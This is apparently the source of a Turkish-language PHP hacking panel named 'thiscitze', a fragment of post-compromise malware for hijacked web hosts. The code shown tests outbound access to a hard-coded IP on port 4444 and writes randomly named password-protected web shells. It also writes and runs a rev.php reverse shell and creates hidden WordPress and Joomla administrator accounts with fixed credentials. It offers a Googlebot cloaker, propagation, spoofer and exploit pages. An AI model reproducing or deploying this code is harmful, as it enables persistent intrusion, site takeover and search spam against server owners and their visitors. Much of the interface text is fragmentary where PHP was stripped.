'); } if ($rsAct === 'full') { $sock = @fsockopen('94.26.106.34', 4444, $fmE, $fmEs, 4); $ew = ($sock !== false); if ($sock) @fclose($sock); $fullDir = rtrim(dirname(__FILE__), '/\\'); $fullName = 'w_' . mt_rand(1000, 9999) . '.php'; $fullFile = $fullDir . '/' . $fullName; $okF = @file_put_contents($fullFile, $wsTpl); if ($okF !== false) { @chmod($fullFile, 0644); } $fullRel = trim(str_replace('\\', '/', dirname(isset($_SERVER['SCRIPT_NAME']) ? $_SERVER['SCRIPT_NAME'] : '/filemanager.php')), '/'); $fullUrl = (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off' ? 'https' : 'http') . '://' . (isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : '') . ($fullRel !== '' ? '/' . $fullRel : '') . '/' . $fullName; $fullOut = ''; if ($okF === false) { $fullOut .= '
Web kabuk YAZILAMADI: ' . htmlspecialchars($fullFile) . '
'; } else { $fullOut .= '
Web Kabuk KURULDU | Sifre: Panel2025x
Kullan: ' . htmlspecialchars($fullUrl . '?k=Panel2025x&c=id') . '
'; } if ($ew) { $revFile = rtrim(detectRoot(), '/\\') . '/rev.php'; $rk = @file_put_contents($revFile, $userRevTpl); if ($rk !== false) { @chmod($revFile, 0644); $owd = @getcwd(); @chdir(rtrim(detectRoot(), '/\\')); @include($revFile); @chdir($owd ? $owd : rtrim(detectRoot(), '/\\')); } $fullOut .= '
EGRESS ACIK — Reverse shell de KURULDU ve calistirildi. nc -lvvp 4444 dinliyorsan oturum gelecek.
'; } else { $fullOut .= '
EGRESS KAPALI / hedef port engelli — Reverse yerine yukaridaki Web Kabuk linkini kullan.
'; } die('
' . $fullOut . '
'); } if ($rsAct === 'webopen') { $wsDir = rtrim(dirname(__FILE__), '/\\'); $wsDir2 = rtrim(detectRoot(), '/\\'); $wsName = 'w_' . mt_rand(1000, 9999) . '.php'; $wsFile = $wsDir . '/' . $wsName; if ($wsDir2 !== $wsDir) { $wsFile2 = $wsDir2 . '/' . $wsName; } else { $wsFile2 = ''; } $okW = @file_put_contents($wsFile, $wsTpl); if ($okW === false) { $wsMsg = 'Yazma hatasi: ' . htmlspecialchars($wsFile); } else { @chmod($wsFile, 0644); } if ($wsFile2 !== '' && $okW !== false) { if (@file_put_contents($wsFile2, $wsTpl) !== false) { @chmod($wsFile2, 0644); } } $wsRel = trim(str_replace('\\', '/', dirname(isset($_SERVER['SCRIPT_NAME']) ? $_SERVER['SCRIPT_NAME'] : '/filemanager.php')), '/'); $wsUrl = (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off' ? 'https' : 'http') . '://' . (isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : '') . ($wsRel !== '' ? '/' . $wsRel : '') . '/' . $wsName; if ($okW === false) { die('
Yazma hatasi: ' . htmlspecialchars($wsFile) . '
'); } die('
Web Kabuk OLUSTURULDU | Dosya: ' . htmlspecialchars($wsName) . ' | Sifre: Panel2025x
Kullan: ' . htmlspecialchars($wsUrl . '?k=Panel2025x&c=id') . '
Dosya, panel klasorune yazilir; URL panelin yanindan hesaplanir. Her seferinde rastgele ad uretilir; en dusuk PHP surumlerinde dahi calisir.
'); } if ($rsAct === 'delete') { $roots = array(detectRoot(), dirname(__FILE__)); foreach (getDomains() as $gd) { if ($gd['root']) $roots[] = $gd['root']; } $del = 0; foreach ($roots as $r) { $f = rtrim($r, '/\\') . '/rev.php'; if (@is_file($f) && @unlink($f)) $del++; foreach (glob(rtrim($r, '/\\') . '/r_console.php') as $old) { if (@unlink($old)) $del++; } foreach (glob(rtrim($r, '/\\') . '/r_probe.php') as $old) { if (@unlink($old)) $del++; } foreach (glob(rtrim($r, '/\\') . '/w_*.php') as $old) { if (@is_file($old) && @unlink($old)) $del++; } } die('
' . $del . ' adet shell dosyasi silindi.
'); } exit; } $auth = checkAuth(); if (!empty($GLOBALS['fm_just_logged_in'])) { header('Location: ?page=' . urlencode($page)); exit; } if (!isset($auth['authenticated']) || !$auth['authenticated']) { $showLogin = true; $loginError = isset($auth['error']) ? $auth['error'] : ''; } else { $showLogin = false; } $fullPath = detectRoot(); if ($page === 'files') { $fullPath = resolvePath($path ? $path : detectRoot()); } elseif ($page === 'domainfiles' && $domain) { $domains = getDomains(); foreach ($domains as $d) { if ($d['name'] === $domain) { $fullPath = $d['root']; break; } } if ($path) { $sub = fm_path($path); if ($sub) $fullPath = resolvePath($sub); } if (!is_dir($fullPath)) $fullPath = detectRoot(); } $realFull = realpath($fullPath) ?: $fullPath; $basePath = ($page === 'domainfiles' && $domain) ? $fullPath : detectRoot(); $pageTitle = 'thiscitze'; if ($showLogin) { $pageTitle = 'Giris - thiscitze'; } elseif ($page === 'files') { $pageTitle = 'Dosyalar - thiscitze'; } elseif ($page === 'domainfiles') { $pageTitle = $domain . ' - thiscitze'; } elseif ($page === 'domains') { $pageTitle = 'Domainler - thiscitze'; } elseif ($page === 'system') { $pageTitle = 'Sistem - thiscitze'; } elseif ($page === 'cloak') { $pageTitle = 'Cloaker - thiscitze'; } elseif ($page === 'wpadmin') { $pageTitle = 'WP Admin - thiscitze'; } elseif ($page === 'propagate') { $pageTitle = 'Deploy - thiscitze'; } elseif ($page === 'spoofer') { $pageTitle = 'Spoofer - thiscitze'; } elseif ($page === 'cache') { $pageTitle = 'Cache Temizle - thiscitze'; } elseif ($page === 'plugins') { $pageTitle = 'WP Pluginleri - thiscitze'; } elseif ($page === 'exploit') { $pageTitle = 'Exploit - thiscitze'; } elseif ($page === 'info') { $pageTitle = 'Server Info - thiscitze'; } elseif ($page === 'revshell') { $pageTitle = 'Rev Shell - thiscitze'; } elseif ($page === 'edit') { $pageTitle = 'Duzenle - thiscitze'; } ?> <?php echo htmlspecialchars($pageTitle); ?>
' . implode(' | ', array_map('htmlspecialchars', array_slice($candidates, 0, 4))) . ''; echo '

Dosya bulunamadi

' . $debugInfo . '
Geri Don
'; exit; } ?>
Geri
satir karakter Hazir
$crumb): if ($ci === 0 && $crumb === '') { $crumbPath = ''; continue; } $crumbPath .= '/' . $crumb; $isLast = ($ci === count($crumbs) - 1); ?> / kls, dosya,
Ad Boyut Tarih Izinler
.. ---
/ -
Duzenle

Bu klasor bos

Toplam Yazilabilir Yazilmaz CMS
0): ?>
0): ?>
$d): $isCurrent = (fm_normDomain($d['name']) === fm_normDomain($curHost)); ?>
Domain Yol CMS Erisim
BURADA BULUNAMADI % v - W R Ac

Domain bulunamadi

domains.json olusturun veya hosting klasorlerini kontrol edin

PHP
cURL
Server
Host
Host name (IP: ) Bilinen hedef Bilinmeyen host
External IP ()
User
Root
Script
OS
Disk /
allow_url
Acik Portlar Taranan portlarda acik port bulunamadi $p): ?>
Disabled
100; $google_files = array(); foreach ((array)@glob($cRoot . '/google*.html') as $gf) { if (preg_match('/^google[a-zA-Z0-9]+\.html$/', basename($gf))) $google_files[] = basename($gf); } sort($google_files); ?>
DURUM
Cloak:
CMS:
Perde: [Goruntule]
KULLANIM SIRASI
1
Perde HTML — Asagidaki kutuya Google bot'a gostermek istedigin HTML sayfayi yapistir, sonra Kaydet butonuna bas.
2
Cloak Kur — Cloak Kur butonuna bas. Sistem index.php'yi duzenler ve cloak'i aktif eder.
3
Test Et — Bot Test ile dene veya Zengin Sonuclar Testi'ne tikla.
Google: [Sil]
ISLEMLER
PERDE HTML
Googlebot'a gosterilecek sayfa. Once KAYDET, sonra Cloak Kur.
Google Dogrulama Dosyasi
Google Search Console dogrulama dosyasi yukleme.
query("SELECT u.ID, u.user_login, u.user_email, m.meta_value as caps FROM `$tu` u LEFT JOIN `$tm` m ON u.ID = m.user_id AND m.meta_key = '{$tp}capabilities' WHERE m.meta_value LIKE '%administrator%' OR u.ID = 1"); $wRoot = dirname($wdb['config']); $wAdmin = cmsAdminUrl($wRoot, 'WordPress'); $wSiteInfo = array('root' => $wRoot, 'admin' => $wAdmin); } ?>

Dosyayi WordPress kok klasorune koyun veya dosya yolu dogru mu kontrol edin.

Site URL wp-config.php (yok)'; ?>
Kok
Prefix
Admin Paneli Ac
Mevcut Adminler
fetch_object()): ?>
ID Kullanici E-posta Islem
ID; ?> user_login); ?> user_email); ?>
ID != 1): ?>
Yeni Admin Ekle
Tek Tikla Admin (WordPress) sysadmin / Panel2025!
Admin Paneli Ac
DIKKAT: Isiniz bitince bu sayfayi silin veya erisimi kapatmis olun.

Joomla kurulumu bulunamadi.

Joomla kok klasorlerinde configuration.php + administrator klasoru aranir.

connect_errno) { $jDbErr = 'Joomla veritabanina baglanilamadi. (' . $jm->connect_error . ')'; } else { $ju = $jPrefixTmp . 'users'; $jug = $jPrefixTmp . 'user_usergroup_map'; $rq = $jm->query("SELECT u.id, u.name, u.username, u.email, u.block FROM `$ju` u INNER JOIN `$jug` g ON u.id = g.user_id WHERE g.group_id = 8 ORDER BY u.id"); if ($rq) { $jAdmins = array(); while ($rr = $rq->fetch_object()) $jAdmins[] = $rr; } else { $jDbErr = 'Super User sorgusu basarisiz (' . $jm->error . ')'; } $jm->close(); } } } else { $jDbErr = 'configuration.php bulunamadi.'; } ?>
v YAZILAMAZ
Admin Paneli Ac
Site URL live_site yok'; ?>
Kok
DB Prefix
Mevcut Super User'lar hesap
ID Ad Kullanici E-posta Durum Islem
id; ?> name); ?> username); ?> email); ?> block === 1): ?> ENGEL AKTIF
id !== 1): ?>
Super User bulunamadi.
Yeni Super User Ekle
Tek Tikla Admin sysadmin / Panel2025!
Admin Paneli Ac

Domainlar taraniyor...

Islem Gecmisi

Kayit yok

Sunucu Hostname
Bilinen hedef Bilinmeyen host
Mevcut shell dosyalari
Yok
()MEVCUT

rev.php Olustur ve Ac senin rev.php'ni birebir ana dizine yazar ve calistirir. nc -lvvp 4444 dinleme tarafinda acik olmali.
Oto Kur (Full) tek tik: once egress testi yapar, sonra her durumda Web Kabuk kurar (sifre Panel2025x). Cikis aciksa ayrica rev.php reverse shell'ini de yazip calistirir.
Web kabuk icin hicbir sey gerekmez — HTTP her zaman acik.